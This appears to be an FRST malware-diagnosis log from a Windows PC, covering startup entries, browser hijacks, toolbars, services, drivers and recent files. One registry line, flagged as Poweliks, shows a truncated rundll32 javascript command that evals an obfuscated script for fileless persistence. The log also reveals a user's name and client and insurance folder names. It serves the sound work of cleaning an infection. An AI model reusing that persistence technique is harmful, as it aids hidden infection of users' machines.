HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [BFHP] => C:\Program Files (x86)\Common Files\BeFrugal.com\Toolbar\BFHP.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM-x32\...\Run: [Malwarebytes Anti-Exploit] => C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe [440632 2014-08-29] (Malwarebytes Corporation)
HKU\S-1-5-21-3448307080-1944955064-2909665858-1000\...\MountPoints2: {7304c3fd-60a8-11e2-a79a-4061869b0540} - I:\MotoCastSetup.exe -a
HKU\S-1-5-21-3448307080-1944955064-2909665858-1000\...\Winlogon: [Shell] C:\Windows\explorer.exe [2871808 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-3448307080-1944955064-2909665858-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\Run: [Norton Download Manager{N360P204040-SHPD-FSD33017}] => C:\Program Files (x86)\Norton One\Engine\3.2.0.19\ccSvcHst.exe /m
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/?fr=befhp&type=iehp-3.13-1406
SearchScopes: HKLM-x32 - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^UX^xdm245^S09956^us&si=CD3493&ptb=2ED6C914-50F3-4D57-87A1-287899C3E724&ind=2014061911&n=780c2557&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - 68B8CF96730C4D55A37F7E95660E8E82 URL = https://search.yahoo.com/search?p={searchTerms}&fr=chr-gl-gen1
SearchScopes: HKCU - {0036D865-6B0E-44BF-BF79-C6EF9B4AD1BA} URL = http://search.conduit.com/Results.aspx?ctid=CT3300025&SearchSource=45&UM=2&q={searchTerms}
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {0A68AFD5-88A3-4B37-89B8-769F0B5839EC} URL = http://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=TV&apn_dtid=OSJ000YYUS&apn_uid=46C12D40-F7A5-49F9-9A9A-C6CB121F860E&apn_sauid=3CF0AC1D-3891-468B-A8BB-BCDF34623CBC
SearchScopes: HKCU - {2BA28830-5973-429F-8F10-532CD9EDEF54} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3294791&CUI=UN39725252282202430&UM=2
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL =
SearchScopes: HKCU - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^UX^xdm245^S09956^us&si=CD3493&ptb=2ED6C914-50F3-4D57-87A1-287899C3E724&ind=2014061911&n=780c2557&psa=&st=sb&searchfor={searchTerms}
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: RoboForm Toolbar Helper -> {724d43a9-0d85-11d4-9908-00400523e39a} -> C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} ->  No File
BHO-x32: RealPlayer Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll (RealPlayer)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: RoboForm Toolbar Helper -> {724d43a9-0d85-11d4-9908-00400523e39a} -> C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll (Siber Systems Inc.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} ->  No File
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll (Siber Systems Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - &RoboForm Toolbar - {724D43A0-0D85-11D4-9908-00400523E39A} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: HKLM-x32 {119CE688-A7E9-1941-8E10-F42990BBA4C4} https://fiserv.assurity.com/reports/control/ASRrptview.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://turborater.webex.com/client/WBXclient-T28L10NSP8EP1-15699/nbr/ieatgpc1.cab
Tcpip\Parameters: [DhcpNameServer] 216.144.187.199 24.229.54.212 204.186.80.229

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1167637.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @real.com/nppl3260;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprjplug;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprjplug.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpchromebrowserrecordext;version=15.0.4.53 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprphtml5videoshim;version=15.0.4.53 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Greg\AppData\Local\Citrix\Plugins\79\npappdetector.dll (Citrix Online)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\safeguard-secure-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\safeguard-secure-search.xml
FF Extension: Word Layers - C:\Program Files (x86)\Mozilla Firefox\extensions\ugnraew@jqhljqmpngx.net [2013-10-16]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-07-10]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2012-08-31]
FF HKLM-x32\...\Firefox\Extensions: [{97E22097-9A2F-45b1-8DAF-36AD648C7EF4}] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF Extension: No Name - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext [2012-05-21]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn [2014-10-25]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF [2014-02-17]

Chrome:
=======
CHR HomePage: Default -> https://www.google.com/
CHR Profile: C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-12]
CHR Extension: (Norton Identity Safe) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-21]
CHR Extension: (RoboForm Lite Password Manager) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\kidhjpmgjfbkmcfpfakmdddddgfbhahj [2014-08-04]
CHR Extension: (Norton Security Toolbar) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2014-02-19]
CHR Extension: (Google Wallet) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-19]
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-04]
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Chrome\Ext\rphtml5video.crx [2014-10-04]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-04]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 GsServer; C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe [8574096 2014-03-30] ()
R2 MbaeSvc; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe [441144 2014-08-29] (Malwarebytes Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 MCLIENT; C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe [143928 2012-12-04] (Symantec Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2013-11-15] (Motorola Mobility LLC)
S3 MSSQL$MSSMLBIZ; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
R2 N360; C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation)
R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [289496 2013-11-28] (Realtek Semiconductor)
S3 B-Service; No ImagePath

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S1 A2DDA; No ImagePath
S0 amdkmafd; C:\Windows\System32\DRIVERS\amdkmafd.sys [21160 2013-10-16] (Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\Windows\System32\DRIVERS\amdkmpfd.sys [36096 2013-10-16] (Advanced Micro Devices, Inc.)
R1 BHDrvx64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\BASHDefs\20141016.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_MCLIENT; C:\Windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [168096 2012-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2013-09-25] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
R1 ESProtectionDriver; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.sys [63000 2014-08-30] ()
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [32512 2013-11-04] ()
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-10-23] (Intel Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\IPSDefs\20141021.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-25] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\VirusDefs\20141022.003\ENG64.SYS [129752 2014-08-21] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\VirusDefs\20141022.003\EX64.SYS [2137304 2014-08-21] (Symantec Corporation)
S3 RdpVideoMiniport; No ImagePath
S3 SmbDrv; C:\Windows\System32\DRIVERS\Smb_driver.sys [22800 2012-08-15] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [34544 2013-10-16] (Synaptics Incorporated)
R3 SRTSP; C:\Windows\System32\Drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16152 2014-10-25] ()
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-03-04] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-02-17] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-02-17] (Symantec Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-22 23:12 - 2014-10-22 23:12 - 00007576 _____ () C:\Users\Greg\Desktop\attach.txt
2014-10-22 23:12 - 2014-10-22 23:11 - 00019296 _____ () C:\Users\Greg\Desktop\dds.txt
2014-10-22 06:49 - 2014-10-25 09:47 - 00000000 ____D () C:\FRST
2014-10-22 00:31 - 2014-10-22 00:33 - 00000000 ____D () C:\AdwCleaner
2014-10-22 00:02 - 2014-10-22 22:58 - 00000000 ____D () C:\Users\Greg\Desktop\VirusCleanup
2014-10-21 15:04 - 2014-10-21 15:04 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Exploit.lnk
2014-10-21 15:04 - 2014-10-21 15:04 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Exploit
2014-10-21 12:23 - 2014-10-25 09:40 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-21 12:22 - 2014-10-21 15:01 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-21 12:22 - 2014-10-21 15:01 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-21 12:22 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-21 12:22 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-21 12:22 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-20 19:42 - 2014-10-20 20:31 - 00000000 ____D () C:\Users\Greg\AppData\Local\NPE
2014-10-16 11:01 - 2014-10-16 11:01 - 00001163 _____ () C:\SeagateAdapter
2014-10-15 17:38 - 2014-10-15 17:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 14:42 - 2014-10-17 15:27 - 00000000 ____D () C:\Users\Greg\AppData\Local\American Enterprise
2014-10-15 14:41 - 2014-10-15 14:41 - 00000358 _____ () C:\Users\Greg\Desktop\Medico.appref-ms
2014-10-15 14:41 - 2014-10-15 14:41 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\American Enterprise Group, Inc
2014-10-13 22:31 - 2014-10-13 22:31 - 00001627 _____ () C:\Users\Greg\Desktop\Clients_Medicare.csv
2014-10-13 16:10 - 2014-10-21 16:29 - 00000000 ____D () C:\Users\Greg\Documents\Pacific life
2014-10-04 09:50 - 2014-10-04 09:50 - 00000000 ____D () C:\Windows\System32\Tasks\Norton 360
2014-09-30 06:43 - 2014-09-30 06:43 - 00000000 ____D () C:\Users\Greg\Documents\Millionaire Series
2014-09-25 18:16 - 2014-09-25 18:16 - 00000355 _____ () C:\Users\Greg\Desktop\Rapid Reflux Relief.url

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-25 09:46 - 2014-02-04 15:00 - 00000556 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3448307080-1944955064-2909665858-1000.job
2014-10-25 09:44 - 2009-07-14 00:45 - 00013760 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-25 09:44 - 2009-07-14 00:45 - 00013760 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-25 09:40 - 2013-09-05 18:28 - 00016152 _____ () C:\Windows\system32\Drivers\SWDUMon.sys
2014-10-25 09:40 - 2013-09-05 18:28 - 00002840 _____ () C:\Windows\System32\Tasks\DriverUpdate Startup
2014-10-25 09:40 - 2013-09-05 18:28 - 00000416 _____ () C:\Windows\Tasks\DriverUpdate Startup.job
2014-10-25 09:40 - 2013-01-20 11:25 - 00000000 ____D () C:\Temp
2014-10-25 09:40 - 2011-07-14 23:39 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-25 09:36 - 2011-09-27 10:54 - 25093619 _____ () C:\Windows\setupact.log
2014-10-25 09:36 - 2011-07-14 23:39 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-25 09:36 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-25 09:33 - 2011-07-14 16:07 - 01555283 _____ () C:\Windows\WindowsUpdate.log
2014-10-25 08:50 - 2013-09-03 19:55 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-22 23:12 - 2012-11-15 16:02 - 00000000 ____D () C:\Users\Greg\AppData\Local\CrashDumps
2014-10-21 21:39 - 2009-07-14 01:08 - 00032576 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-21 21:15 - 2012-08-14 20:57 - 00000000 ____D () C:\Users\Greg\Documents\Outlook Files
2014-10-21 20:46 - 2012-09-30 09:49 - 00000000 ____D () C:\Users\Greg\AppData\Local\Deployment
2014-10-21 18:57 - 2011-09-30 08:15 - 02517240 _____ () C:\Windows\PFRO.log
2014-10-21 18:04 - 2012-06-14 14:55 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-21 15:58 - 2011-12-08 09:44 - 00000000 ____D () C:\Users\Greg\AppData\Local\join.me
2014-10-21 12:24 - 2009-07-14 01:13 - 00852346 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-21 10:28 - 2012-12-08 15:01 - 00000000 ____D () C:\Program Files (x86)\Ask.com
2014-10-21 10:28 - 2011-08-25 06:57 - 00000000 ____D () C:\Firefox
2014-10-21 09:33 - 2012-10-10 09:17 - 00000000 ____D () C:\Users\Greg\Finance
2014-10-20 20:36 - 2012-10-10 07:16 - 00000000 ____D () C:\Users\Greg\DVDs
2014-10-20 19:45 - 2013-01-11 19:50 - 00000000 ____D () C:\NPE
2014-10-20 16:53 - 2011-07-14 16:35 - 00844468 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-10-20 16:51 - 2013-08-15 03:00 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-20 10:16 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\7-BOOK OF BUSINESS
2014-10-20 09:56 - 2014-04-05 16:24 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\GoodSync
2014-10-19 12:49 - 2011-07-14 16:02 - 00000000 ____D () C:\Users\Greg
2014-10-19 12:48 - 2012-10-09 22:38 - 00000000 ____D () C:\Users\Greg\Vacation
2014-10-18 11:00 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\3 INS CO LOGIN
2014-10-18 10:50 - 2012-11-07 16:05 - 00000000 ____D () C:\Users\Greg\Documents\CASE DESIGN
2014-10-18 07:22 - 2011-07-14 23:39 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-18 07:22 - 2011-07-14 23:39 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 15:26 - 2013-07-28 07:34 - 00000000 ____D () C:\Users\Greg\Documents\Retirement Planning
2014-10-17 14:21 - 2014-04-05 16:19 - 00000000 ____D () C:\Users\Greg\Robo Form
